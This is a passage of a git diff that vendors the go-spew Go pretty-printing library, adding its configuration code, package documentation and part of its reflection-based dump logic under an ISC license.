+ []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})},
+ []reflect.Value{v(sortableStruct{1}), v(sortableStruct{2}), v(sortableStruct{3})},
+ },
+ // UnsortableStructs.
+ {
+ []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+ []reflect.Value{v(unsortableStruct{1}), v(unsortableStruct{2}), v(unsortableStruct{3})},
+ },
+ }
+ cs := spew.ConfigState{DisableMethods: true, SpewKeys: true}
+ helpTestSortValues(tests, &cs, t)
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/config.go b/vendor/github.com/davecgh/go-spew/spew/config.go
new file mode 100644
index 0000000000..2e3d22f312
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/config.go
@@ -0,0 +1,306 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+ "bytes"
+ "fmt"
+ "io"
+ "os"
+)
+
+// ConfigState houses the configuration options used by spew to format and
+// display values. There is a global instance, Config, that is used to control
+// all top-level Formatter and Dump functionality. Each ConfigState instance
+// provides methods equivalent to the top-level functions.
+//
+// The zero value for ConfigState provides no indentation. You would typically
+// want to set it to a space or a tab.
+//
+// Alternatively, you can use NewDefaultConfig to get a ConfigState instance
+// with default settings. See the documentation of NewDefaultConfig for default
+// values.
+type ConfigState struct {
+ // Indent specifies the string to use for each indentation level. The
+ // global config instance that all top-level functions use sets this to a
+ // single space by default. If you would like more indentation, you might
+ // set this to a tab with "\t" or perhaps two spaces with " ".
+ Indent string
+
+ // MaxDepth controls the maximum number of levels to descend into nested
+ // data structures. The default, 0, means there is no limit.
+ //
+ // NOTE: Circular data structures are properly detected, so it is not
+ // necessary to set this value unless you specifically want to limit deeply
+ // nested data structures.
+ MaxDepth int
+
+ // DisableMethods specifies whether or not error and Stringer interfaces are
+ // invoked for types that implement them.
+ DisableMethods bool
+
+ // DisablePointerMethods specifies whether or not to check for and invoke
+ // error and Stringer interfaces on types which only accept a pointer
+ // receiver when the current type is not a pointer.
+ //
+ // NOTE: This might be an unsafe action since calling one of these methods
+ // with a pointer receiver could technically mutate the value, however,
+ // in practice, types which choose to satisfy an error or Stringer
+ // interface with a pointer receiver should not be mutating their state
+ // inside these interface methods. As a result, this option relies on
+ // access to the unsafe package, so it will not have any effect when
+ // running in environments without access to the unsafe package such as
+ // Google App Engine or with the "safe" build tag specified.
+ DisablePointerMethods bool
+
+ // DisablePointerAddresses specifies whether to disable the printing of
+ // pointer addresses. This is useful when diffing data structures in tests.
+ DisablePointerAddresses bool
+
+ // DisableCapacities specifies whether to disable the printing of capacities
+ // for arrays, slices, maps and channels. This is useful when diffing
+ // data structures in tests.
+ DisableCapacities bool
+
+ // ContinueOnMethod specifies whether or not recursion should continue once
+ // a custom error or Stringer interface is invoked. The default, false,
+ // means it will print the results of invoking the custom error or Stringer
+ // interface and return immediately instead of continuing to recurse into
+ // the internals of the data type.
+ //
+ // NOTE: This flag does not have any effect if method invocation is disabled
+ // via the DisableMethods or DisablePointerMethods options.
+ ContinueOnMethod bool
+
+ // SortKeys specifies map keys should be sorted before being printed. Use
+ // this to have a more deterministic, diffable output. Note that only
+ // native types (bool, int, uint, floats, uintptr and string) and types
+ // that support the error or Stringer interfaces (if methods are
+ // enabled) are supported, with other types sorted according to the
+ // reflect.Value.String() output which guarantees display stability.
+ SortKeys bool
+
+ // SpewKeys specifies that, as a last resort attempt, map keys should
+ // be spewed to strings and sorted by those strings. This is only
+ // considered if SortKeys is true.
+ SpewKeys bool
+}
+
+// Config is the active configuration of the top-level functions.
+// The configuration can be changed by modifying the contents of spew.Config.
+var Config = ConfigState{Indent: " "}
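+
+// A minimal usage sketch (illustrative; myVar stands in for any value): a
+// locally scoped ConfigState leaves the global Config untouched, which
+// matters when several packages share the top-level functions.
+//
+// cs := spew.ConfigState{Indent: "\t", SortKeys: true}
+// cs.Dump(myVar)
+// str := cs.Sdump(myVar)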
+
+// Errorf is a wrapper for fmt.Errorf that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the formatted string as a value that satisfies error. See NewFormatter
+// for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Errorf(format, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Errorf(format string, a ...interface{}) (err error) {
+ return fmt.Errorf(format, c.convertArgs(a)...)
+}
+
+// Fprint is a wrapper for fmt.Fprint that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the number of bytes written and any write error encountered. See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Fprint(w, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Fprint(w io.Writer, a ...interface{}) (n int, err error) {
+ return fmt.Fprint(w, c.convertArgs(a)...)
+}
+
+// Fprintf is a wrapper for fmt.Fprintf that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the number of bytes written and any write error encountered. See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Fprintf(w, format, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Fprintf(w io.Writer, format string, a ...interface{}) (n int, err error) {
+ return fmt.Fprintf(w, format, c.convertArgs(a)...)
+}
+
+// Fprintln is a wrapper for fmt.Fprintln that treats each argument as if it
+// were passed with a Formatter interface returned by c.NewFormatter. It
+// returns the number of bytes written and any write error encountered. See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Fprintln(w, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Fprintln(w io.Writer, a ...interface{}) (n int, err error) {
+ return fmt.Fprintln(w, c.convertArgs(a)...)
+}
+
+// Print is a wrapper for fmt.Print that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the number of bytes written and any write error encountered. See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Print(c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Print(a ...interface{}) (n int, err error) {
+ return fmt.Print(c.convertArgs(a)...)
+}
+
+// Printf is a wrapper for fmt.Printf that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the number of bytes written and any write error encountered. See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Printf(format, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Printf(format string, a ...interface{}) (n int, err error) {
+ return fmt.Printf(format, c.convertArgs(a)...)
+}
+
+// Println is a wrapper for fmt.Println that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the number of bytes written and any write error encountered. See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Println(c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Println(a ...interface{}) (n int, err error) {
+ return fmt.Println(c.convertArgs(a)...)
+}
+
+// Sprint is a wrapper for fmt.Sprint that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the resulting string. See NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Sprint(c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Sprint(a ...interface{}) string {
+ return fmt.Sprint(c.convertArgs(a)...)
+}
+
+// Sprintf is a wrapper for fmt.Sprintf that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the resulting string. See NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Sprintf(format, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Sprintf(format string, a ...interface{}) string {
+ return fmt.Sprintf(format, c.convertArgs(a)...)
+}
+
+// Sprintln is a wrapper for fmt.Sprintln that treats each argument as if it
+// were passed with a Formatter interface returned by c.NewFormatter. It
+// returns the resulting string. See NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Sprintln(c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Sprintln(a ...interface{}) string {
+ return fmt.Sprintln(c.convertArgs(a)...)
+}
+
+/*
+NewFormatter returns a custom formatter that satisfies the fmt.Formatter
+interface. As a result, it integrates cleanly with standard fmt package
+printing functions. The formatter is useful for inline printing of smaller data
+types similar to the standard %v format specifier.
+
+The custom formatter only responds to the %v (most compact), %+v (adds pointer
+addresses), %#v (adds types), and %#+v (adds types and pointer addresses) verb
+combinations. Any other verbs such as %x and %q will be sent to the
+standard fmt package for formatting. In addition, the custom formatter ignores
+the width and precision arguments (however they will still work on the format
+specifiers not handled by the custom formatter).
+
+Typically this function shouldn't be called directly. It is much easier to make
+use of the custom formatter by calling one of the convenience functions such as
+c.Printf, c.Println, or c.Fprintf.
+*/
+func (c *ConfigState) NewFormatter(v interface{}) fmt.Formatter {
+ return newFormatter(c, v)
+}
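+
+// A short sketch (myVar is a hypothetical placeholder value): the returned
+// formatter can be handed directly to the standard fmt package.
+//
+// cs := spew.NewDefaultConfig()
+// fmt.Printf("myVar: %+v\n", cs.NewFormatter(myVar))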
+
+// Fdump formats and displays the passed arguments to io.Writer w. It formats
+// exactly the same as Dump.
+func (c *ConfigState) Fdump(w io.Writer, a ...interface{}) {
+ fdump(c, w, a...)
+}
+
+/*
+Dump displays the passed parameters to standard out with newlines, customizable
+indentation, and additional debug information such as complete types and all
+pointer addresses used to indirect to the final value. It provides the
+following features over the built-in printing facilities provided by the fmt
+package:
+
+ * Pointers are dereferenced and followed
+ * Circular data structures are detected and handled properly
+ * Custom Stringer/error interfaces are optionally invoked, including
+ on unexported types
+ * Custom types which only implement the Stringer/error interfaces via
+ a pointer receiver are optionally invoked when passing non-pointer
+ variables
+ * Byte arrays and slices are dumped like the hexdump -C command which
+ includes offsets, byte values in hex, and ASCII output
+
+The configuration options are controlled by modifying the public members
+of c. See ConfigState for options documentation.
+
+See Fdump if you would prefer dumping to an arbitrary io.Writer or Sdump to
+get the formatted result as a string.
+*/
+func (c *ConfigState) Dump(a ...interface{}) {
+ fdump(c, os.Stdout, a...)
+}
+
+// Sdump returns a string with the passed arguments formatted exactly the same
+// as Dump.
+func (c *ConfigState) Sdump(a ...interface{}) string {
+ var buf bytes.Buffer
+ fdump(c, &buf, a...)
+ return buf.String()
+}
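+
+// A common pattern (sketch; cs is a ConfigState and got, want, and t are
+// hypothetical test values): Sdump output is a plain string, so it slots
+// easily into test failure messages.
+//
+// if cs.Sdump(got) != cs.Sdump(want) {
+// 	t.Errorf("got:\n%s\nwant:\n%s", cs.Sdump(got), cs.Sdump(want))
+// }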
+
+// convertArgs accepts a slice of arguments and returns a slice of the same
+// length with each argument converted to a spew Formatter interface using
+// the ConfigState associated with c.
+func (c *ConfigState) convertArgs(args []interface{}) (formatters []interface{}) {
+ formatters = make([]interface{}, len(args))
+ for index, arg := range args {
+ formatters[index] = newFormatter(c, arg)
+ }
+ return formatters
+}
+
+// NewDefaultConfig returns a ConfigState with the following default settings.
+//
+// Indent: " "
+// MaxDepth: 0
+// DisableMethods: false
+// DisablePointerMethods: false
+// DisablePointerAddresses: false
+// DisableCapacities: false
+// ContinueOnMethod: false
+// SortKeys: false
+// SpewKeys: false
+func NewDefaultConfig() *ConfigState {
+ return &ConfigState{Indent: " "}
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/doc.go b/vendor/github.com/davecgh/go-spew/spew/doc.go
new file mode 100644
index 0000000000..aacaac6f1e
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/doc.go
@@ -0,0 +1,211 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+Package spew implements a deep pretty printer for Go data structures to aid in
+debugging.
+
+A quick overview of the additional features spew provides over the built-in
+printing facilities for Go data types is as follows:
+
+ * Pointers are dereferenced and followed
+ * Circular data structures are detected and handled properly
+ * Custom Stringer/error interfaces are optionally invoked, including
+ on unexported types
+ * Custom types which only implement the Stringer/error interfaces via
+ a pointer receiver are optionally invoked when passing non-pointer
+ variables
+ * Byte arrays and slices are dumped like the hexdump -C command which
+ includes offsets, byte values in hex, and ASCII output (only when using
+ Dump style)
+
+There are two different approaches spew allows for dumping Go data structures:
+
+ * Dump style which prints with newlines, customizable indentation,
+ and additional debug information such as types and all pointer addresses
+ used to indirect to the final value
+ * A custom Formatter interface that integrates cleanly with the standard fmt
+ package and replaces %v, %+v, %#v, and %#+v to provide inline printing
+ similar to the default %v while providing the additional functionality
+ outlined above and passing unsupported format verbs such as %x and %q
+ along to fmt
+
+Quick Start
+
+This section demonstrates how to quickly get started with spew. See the
+sections below for further details on formatting and configuration options.
+
+To dump a variable with full newlines, indentation, type, and pointer
+information use Dump, Fdump, or Sdump:
+ spew.Dump(myVar1, myVar2, ...)
+ spew.Fdump(someWriter, myVar1, myVar2, ...)
+ str := spew.Sdump(myVar1, myVar2, ...)
+
+Alternatively, if you would prefer to use format strings with a compacted inline
+printing style, use the convenience wrappers Printf, Fprintf, etc with
+%v (most compact), %+v (adds pointer addresses), %#v (adds types), or
+%#+v (adds types and pointer addresses):
+ spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+ spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+ spew.Fprintf(someWriter, "myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+ spew.Fprintf(someWriter, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+
+Configuration Options
+
+Configuration of spew is handled by fields in the ConfigState type. For
+convenience, all of the top-level functions use a global state available
+via the spew.Config global.
+
+It is also possible to create a ConfigState instance that provides methods
+equivalent to the top-level functions. This allows multiple configurations
+to be used independently of one another. See the ConfigState documentation
+for more details.
+
+The following configuration options are available:
+ * Indent
+ String to use for each indentation level for Dump functions.
+ It is a single space by default. A popular alternative is "\t".
+
+ * MaxDepth
+ Maximum number of levels to descend into nested data structures.
+ There is no limit by default.
+
+ * DisableMethods
+ Disables invocation of error and Stringer interface methods.
+ Method invocation is enabled by default.
+
+ * DisablePointerMethods
+ Disables invocation of error and Stringer interface methods on types
+ which only accept pointer receivers from non-pointer variables.
+ Pointer method invocation is enabled by default.
+
+ * DisablePointerAddresses
+ Disables the printing of pointer addresses. This is useful when
+ diffing data structures in tests. Pointer addresses are printed
+ by default.
+
+ * DisableCapacities
+ Disables the printing of capacities for arrays, slices, maps and
+ channels. This is useful when diffing data structures in tests.
+ Capacities are printed by default.
+
+ * ContinueOnMethod
+ Enables recursion into types after invoking error and Stringer interface
+ methods. Recursion after method invocation is disabled by default.
+
+ * SortKeys
+ Specifies map keys should be sorted before being printed. Use
+ this to have a more deterministic, diffable output. Note that
+ only native types (bool, int, uint, floats, uintptr and string)
+ and types which implement error or Stringer interfaces are
+ supported with other types sorted according to the
+ reflect.Value.String() output which guarantees display
+ stability. Natural map order is used by default.
+
+ * SpewKeys
+ Specifies that, as a last resort attempt, map keys should be
+ spewed to strings and sorted by those strings. This is only
+ considered if SortKeys is true.
+
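+For example, a configuration tuned for deterministic, diff-friendly output in
+tests might be set up as in this sketch (the chosen fields are illustrative,
+not defaults):
+
+ spew.Config.SortKeys = true
+ spew.Config.DisablePointerAddresses = true
+ spew.Config.DisableCapacities = true
+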
+Dump Usage
+
+Simply call spew.Dump with a list of variables you want to dump:
+
+ spew.Dump(myVar1, myVar2, ...)
+
+You may also call spew.Fdump if you would prefer to output to an arbitrary
+io.Writer. For example, to dump to standard error:
+
+ spew.Fdump(os.Stderr, myVar1, myVar2, ...)
+
+A third option is to call spew.Sdump to get the formatted output as a string:
+
+ str := spew.Sdump(myVar1, myVar2, ...)
+
+Sample Dump Output
+
+See the Dump example for details on the setup of the types and variables being
+shown here.
+
+ (main.Foo) {
+ unexportedField: (*main.Bar)(0xf84002e210)({
+ flag: (main.Flag) flagTwo,
+ data: (uintptr)
+ }),
+ ExportedField: (map[interface {}]interface {}) (len=1) {
+ (string) (len=3) "one": (bool) true
+ }
+ }
+
+Byte (and uint8) arrays and slices are displayed uniquely like the hexdump -C
+command as shown.
+ ([]uint8) (len=32 cap=32) {
+ 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 |............... |
+ 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 |!"#$%&'()*+,-./0|
+ 00000020 31 32 |12|
+ }
+
+Custom Formatter
+
+Spew provides a custom formatter that implements the fmt.Formatter interface
+so that it integrates cleanly with standard fmt package printing functions. The
+formatter is useful for inline printing of smaller data types similar to the
+standard %v format specifier.
+
+The custom formatter only responds to the %v (most compact), %+v (adds pointer
+addresses), %#v (adds types), or %#+v (adds types and pointer addresses) verb
+combinations. Any other verbs such as %x and %q will be sent to the
+standard fmt package for formatting. In addition, the custom formatter ignores
+the width and precision arguments (however they will still work on the format
+specifiers not handled by the custom formatter).
+
+Custom Formatter Usage
+
+The simplest way to make use of the spew custom formatter is to call one of the
+convenience functions such as spew.Printf, spew.Println, or spew.Fprintf. The
+functions have syntax you are most likely already familiar with:
+
+ spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+ spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+ spew.Println(myVar, myVar2)
+ spew.Fprintf(os.Stderr, "myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+ spew.Fprintf(os.Stderr, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+
+See the Index for the full list of convenience functions.
+
+Sample Formatter Output
+
+Double pointer to a uint8:
+ %v: <**>5
+ %+v: <**>(0xf8400420d0->0xf8400420c8)5
+ %#v: (**uint8)5
+ %#+v: (**uint8)(0xf8400420d0->0xf8400420c8)5
+
+Pointer to circular struct with a uint8 field and a pointer to itself:
+ %v: <*>{1 <*>}
+ %+v: <*>(0xf84003e260){ui8:1 c:<*>(0xf84003e260)}
+ %#v: (*main.circular){ui8:(uint8)1 c:(*main.circular)}
+ %#+v: (*main.circular)(0xf84003e260){ui8:(uint8)1 c:(*main.circular)(0xf84003e260)}
+
+See the Printf example for details on the setup of variables being shown
+here.
+
+Errors
+
+Since it is possible for custom Stringer/error interfaces to panic, spew
+detects them and handles them internally by printing the panic information
+inline with the output. Since spew is intended to provide deep pretty printing
+capabilities on structures, it intentionally does not return any errors.
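+
+As an illustrative sketch (the exact message text depends on the recovered
+panic value), a Stringer that panics is reported inline rather than aborting
+the dump:
+
+ type panicer int
+ func (p panicer) String() string { panic("test panic") }
+ spew.Dump(panicer(127))
+ // the dump output contains: (PANIC=test panic)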
+*/
+package spew
diff --git a/vendor/github.com/davecgh/go-spew/spew/dump.go b/vendor/github.com/davecgh/go-spew/spew/dump.go
new file mode 100644
index 0000000000..df1d582a72
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/dump.go
@@ -0,0 +1,509 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+ "bytes"
+ "encoding/hex"
+ "fmt"
+ "io"
+ "os"
+ "reflect"
+ "regexp"
+ "strconv"
+ "strings"
+)
+
+var (
+ // uint8Type is a reflect.Type representing a uint8. It is used to
+ // convert cgo types to uint8 slices for hexdumping.
+ uint8Type = reflect.TypeOf(uint8(0))
+
+ // cCharRE is a regular expression that matches a cgo char.
+ // It is used to detect character arrays to hexdump them.
+ cCharRE = regexp.MustCompile("^.*\\._Ctype_char$")
+
+ // cUnsignedCharRE is a regular expression that matches a cgo unsigned
+ // char. It is used to detect unsigned character arrays to hexdump
+ // them.
+ cUnsignedCharRE = regexp.MustCompile("^.*\\._Ctype_unsignedchar$")
+
+ // cUint8tCharRE is a regular expression that matches a cgo uint8_t.
+ // It is used to detect uint8_t arrays to hexdump them.
+ cUint8tCharRE = regexp.MustCompile("^.*\\._Ctype_uint8_t$")
+)
+
+// dumpState contains information about the state of a dump operation.
+type dumpState struct {
+ w io.Writer
+ depth int
+ pointers map[uintptr]int
+ ignoreNextType bool
+ ignoreNextIndent bool
+ cs *ConfigState
+}
+
+// indent performs indentation according to the depth level and cs.Indent
+// option.
+func (d *dumpState) indent() {
+ if d.ignoreNextIndent {
+ d.ignoreNextIndent = false
+ return
+ }
+ d.w.Write(bytes.Repeat([]byte(d.cs.Indent), d.depth))
+}
+
+// unpackValue returns values inside of non-nil interfaces when possible.
+// This is useful for data types like structs, arrays, slices, and maps which
+// can contain varying types packed inside an interface.
+func (d *dumpState) unpackValue(v reflect.Value) reflect.Value {
+ if v.Kind() == reflect.Interface && !v.IsNil() {
+ v = v.Elem()
+ }
+ return v
+}
+
+// dumpPtr handles formatting of pointers by indirecting them as necessary.
+func (d *dumpState) dumpPtr(v reflect.Value) {
+ // Remove pointers at or below the current depth from map used to detect
+ // circular refs.
+ for k, depth := range d.pointers {
+ if depth >= d.depth {
+ delete(d.pointers, k)
+ }
+ }
+
+ // Keep list of all dereferenced pointers to show later.
+ pointerChain := make([]uintptr, 0)
+
+ // Figure out how many levels of indirection there are by dereferencing
+ // pointers and unpacking interfaces down the chain while detecting circular
+ // references.
+ nilFound := false
+ cycleFound := false
+ indirects := 0
+ ve := v
+ for ve.Kind() == reflect.Ptr {
+ if ve.IsNil() {
+ nilFound = true
+ break
+ }
+ indirects++
+ addr := ve.Pointer()
+ pointerChain = append(pointerChain, addr)
+ if pd, ok := d.pointers[addr]; ok && pd < d.depth {
+ cycleFound = true
+ indirects--
+ break
+ }
+ d.pointers[addr] = d.depth
+
+ ve = ve.Elem()
+ if ve.Kind() == reflect.Interface {
+ if ve.IsNil() {
+ nilFound = true
+ break
+ }
+ ve = ve.Elem()
+ }
+ }
+
+ // Display type information.
+ d.w.Write(openParenBytes)
+ d.w.Write(bytes.Repeat(asteriskBytes, indirects))
+ d.w.Write([]byte(ve.Type().String()))
+ d.w.Write(closeParenBytes)
+
+ // Display pointer information.
+ if !d.cs.DisablePointerAddresses && len(pointerChain) > 0 {
+ d.w.Write(openParenBytes)
+ for i, addr := range pointerChain {
+ if i > 0 {
+ d.w.Write(pointerChainBytes)
+ }
+ printHexPtr(d.w, addr)
+ }
+ d.w.Write(closeParenBytes)
+ }
+
+ // Display dereferenced value.
+ d.w.Write(openParenBytes)
+ switch {
+ case nilFound:
+ d.w.Write(nilAngleBytes)
+
+ case cycleFound:
+ d.w.Write(circularBytes)
+
+ default:
+ d.ignoreNextType = true
+ d.dump(ve)
+ }
+ d.w.Write(closeParenBytes)
+}
+
+// dumpSlice handles formatting of arrays and slices. Byte (uint8 under
+// reflection) arrays and slices are dumped in hexdump -C fashion.
+func (d *dumpState) dumpSlice(v reflect.Value) {
+ // Determine whether this type should be hex dumped or not. Also,
+ // for types which should be hexdumped, try to use the underlying data
+ // first, then fall back to trying to convert them to a uint8 slice.
+ var buf []uint8
+ doConvert := false
+ doHexDump := false
+ numEntries := v.Len()
+ if numEntries > 0 {
+ vt := v.Index(0).Type()
+ vts := vt.String()
+ switch {
+ // C types that need to be converted.
+ case cCharRE.MatchString(vts):
+ fallthrough
+ case cUnsignedCharRE.MatchString(vts):
+ fallthrough
+ case cUint8tCharRE.MatchString(vts):
+ doConvert = true
+
+ // Try to use existing uint8 slices and fall back to converting
+ // and copying if that fails.
+ case vt.Kind() == reflect.Uint8:
+ // We need an addressable interface to convert the type
+ // to a byte slice. However, the reflect package won't
+ // give us an interface on certain things like
+ // unexported struct fields in order to enforce
+ // visibility rules. We use unsafe, when available, to
+ // bypass these restrictions since this package does not
+ // mutate the values.
+ vs := v
+ if !vs.CanInterface() || !vs.CanAddr() {
+ vs = unsafeReflectValue(vs)
+ }
+ if !UnsafeDisabled {
+ vs = vs.Slice(0, numEntries)
+
+ // Use the existing uint8 slice if it can be
+ // type asserted.
+ iface := vs.Interface()
+ if slice, ok := iface.([]uint8); ok {
+ buf = slice
+ doHexDump = true
+ break
+ }
+ }
+
+ // The underlying data needs to be converted if it can't
+ // be type asserted to a uint8 slice.
+ doConvert = true
+ }
+
+ // Copy and convert the underlying type if needed.
+ if doConvert && vt.ConvertibleTo(uint8Type) {
+ // Convert and copy each element into a uint8 byte
+ // slice.
+ buf = make([]uint8, numEntries)
+ for i := 0; i < numEntries; i++ {
+ vv := v.Index(i)
+ buf[i] = uint8(vv.Convert(uint8Type).Uint())
+ }
+ doHexDump = true
+ }
+ }
+
+ // Hexdump the entire slice as needed.
+ if doHexDump {
+ indent := strings.Repeat(d.cs.Indent, d.depth)
+ str := indent + hex.Dump(buf)
+ str = strings.Replace(str, "\n", "\n"+indent, -1)
+ str = strings.TrimRight(str, d.cs.Indent)
+ d.w.Write([]byte(str))
+ return
+ }
+
+ // Recursively call dump for each item.
+ for i := 0; i < numEntries; i++ {
+ d.dump(d.unpackValue(v.Index(i)))
+ if i < (numEntries - 1) {
+ d.w.Write(commaNewlineBytes)
+ } else {
+ d.w.Write(newlineBytes)
+ }
+ }
+}
+
+// dump is the main workhorse for dumping a value. It uses the passed reflect
+// value to figure out what kind of object we are dealing with and formats it
+// appropriately. It is a recursive function, however circular data structures
+// are detected and handled properly.
+func (d *dumpState) dump(v reflect.Value) {
+ // Handle invalid reflect values immediately.
+ kind := v.Kind()
+ if kind == reflect.Invalid {
+ d.w.Write(invalidAngleBytes)
+ return
+ }
+
+ // Handle pointers specially.
+ if kind == reflect.Ptr {
+ d.indent()
+ d.dumpPtr(v)
+ return
+ }
+
+ // Print type information unless already handled elsewhere.
+ if !d.ignoreNextType {
+ d.indent()
+ d.w.Write(openParenBytes)
+ d.w.Write([]byte(v.Type().String()))
+ d.w.Write(closeParenBytes)
+ d.w.Write(spaceBytes)
+ }
+ d.ignoreNextType = false
+
+ // Display length and capacity if the built-in len and cap functions
+ // work with the value's kind and the len/cap itself is non-zero.
+ valueLen, valueCap := 0, 0
+ switch v.Kind() {
+ case reflect.Array, reflect.Slice, reflect.Chan:
+ valueLen, valueCap = v.Len(), v.Cap()
+ case reflect.Map, reflect.String:
+ valueLen = v.Len()
+ }
+ if valueLen != 0 || !d.cs.DisableCapacities && valueCap != 0 {
+ d.w.Write(openParenBytes)
+ if valueLen != 0 {
+ d.w.Write(lenEqualsBytes)
+ printInt(d.w, int64(valueLen), 10)
+ }
+ if !d.cs.DisableCapacities && valueCap != 0 {
+ if valueLen != 0 {
+ d.w.Write(spaceBytes)
+ }
+ d.w.Write(capEqualsBytes)
+ printInt(d.w, int64(valueCap), 10)
+ }
+ d.w.Write(closeParenBytes)
+ d.w.Write(spaceBytes)
+ }
+
+ // Call Stringer/error interfaces if they exist and method invocation is
+ // enabled.
+ if !d.cs.DisableMethods {
+ if (kind != reflect.Invalid) && (kind != reflect.Interface) {
+ if handled := handleMethods(d.cs, d.w, v); handled {
+ return
+ }
+ }
+ }
+
+ switch kind {
+ case reflect.Invalid:
+ // Do nothing. We should never get here since invalid has already
+ // been handled above.
+
+ case reflect.Bool:
+ printBool(d.w, v.Bool())
+
+ case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+ printInt(d.w, v.Int(), 10)
+
+ case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint:
